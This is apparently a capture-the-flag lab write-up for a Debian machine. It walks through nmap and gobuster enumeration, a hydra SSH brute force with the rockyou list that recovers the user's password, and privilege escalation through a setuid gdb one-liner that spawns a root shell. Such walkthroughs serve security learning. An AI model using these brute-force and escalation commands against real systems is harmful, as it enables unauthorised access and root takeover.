Enumeration
Machine IP → 192.168.208.142
Network Scan
Nmap scan → nmap -sC -sV -Pn -p- -A -o nmap.txt 192.168.208.142
OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel
| Port | Service | Other details (if any) |
|---|---|---|
| 22 | SSH | OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) |
| 80 | HTTP | Apache httpd 2.4.38 ((Debian)) |
Web Scan
GoBuster scan → gobuster dir -u http://192.168.208.142 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php
This did not reveal any useful information.
Exploitation
Using the image on the webpage as a reference, the username could be gaara. Therefore, used hydra to brute force the ssh server against the rockyou password list.
hydra -l gaara -P /usr/share/wordlists/rockyou.txt ssh://192.168.208.142:22
This gives the password as iloveyou2 and subsequently gets the user flag.
Privilege Escalation
Checking for setuid binaries reveals the presence of gdb as a setuid to root executable. The user is not present in the sudoers file. Therefore, it is essential to escalate using the gdb binary.
This is done as follows → gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit.
This grants the root shell and subsequently the root flag.